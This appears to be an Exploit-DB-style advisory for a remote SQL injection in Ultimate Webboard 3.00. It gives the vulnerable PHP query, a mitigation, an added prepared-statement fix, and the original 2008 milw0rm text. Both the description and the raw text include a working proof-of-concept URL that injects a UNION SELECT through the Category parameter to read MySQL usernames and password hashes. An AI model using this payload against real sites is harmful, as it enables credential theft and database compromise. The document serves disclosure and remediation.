Vendor: Webboard
By: CWH Underground
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: Webboard
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:php:webboard:3.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability

Ultimate Webboard 3.00 is vulnerable to SQL injection: a remote attacker can inject arbitrary SQL commands through the 'Category' parameter of the 'webboard.php' script, because the parameter value is placed directly inside a quoted string in the query. PHP's magic quotes must be turned off for the attack to succeed. An example exploit URL is http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root

Mitigation:

Ensure that Magic Quote is turned on and that user input is properly sanitized before being used in SQL queries.
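
The fix the mitigation points to, as an added example (not code from the advisory or from Ultimate Webboard): the string-built query from webboard.php rewritten with a bound parameter, which does not depend on magic quotes, a feature PHP removed in 5.4. The in-memory SQLite database, the Topic column, the sample rows and the listTopics helper are assumptions made so the block runs on its own; only board_data, Category and No come from the page.

```php
<?php
// Added example. Schema and rows are constructed; the real table layout is not on the page.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With a MySQL DSN, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server, not the client library, binds the value.
$pdo->exec('CREATE TABLE board_data ("No" INTEGER PRIMARY KEY, Category TEXT, Topic TEXT)');
$pdo->exec("INSERT INTO board_data (Category, Topic) VALUES
            ('general', 'Welcome'), ('general', 'Rules'), ('help', 'Login problem')");

// Hypothetical helper standing in for the query in webboard.php.
function listTopics(PDO $pdo, $category): array
{
    // Reject arrays (?Category[]=x), empty and oversized values before querying.
    if (!is_string($category) || $category === '' || strlen($category) > 64) {
        return [];
    }
    // The SQL text is constant; the value is sent as data, so a quote
    // character in it cannot close the string literal.
    $stmt = $pdo->prepare(
        'SELECT "No", Category, Topic FROM board_data
         WHERE Category = :category ORDER BY "No" DESC'
    );
    $stmt->execute([':category' => $category]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal category, a value containing a quote and
// SQL keywords, and an array as PHP builds it from ?Category[]=x.
foreach (['general', "general' OR '1'='1", ['x']] as $input) {
    $rows = listTopics($pdo, $input);
    printf("%-22s => %d row(s)\n", is_string($input) ? $input : '(array)', count($rows));
}
```

The POC reads mysql.user, so the database account the board connects with should also have no privileges on the mysql schema.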

Exploit-DB raw data:

================================================================================
  Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability
================================================================================

AUTHOR : CWH Underground
DATE   : 26 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : Ultimate Webboard 
VERSION     : 3.00
DOWNLOAD    : http://php.deeserver.net/download/get/79/webboard3.0.0.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must be turned off **

-----------------------------------
 Vulnerable File (webboard.php)
-----------------------------------

$sql="select * from board_data where Category='$Category' order by No DESC";

---------
 Exploit
---------

[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection]


------
 POC
------

[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-26]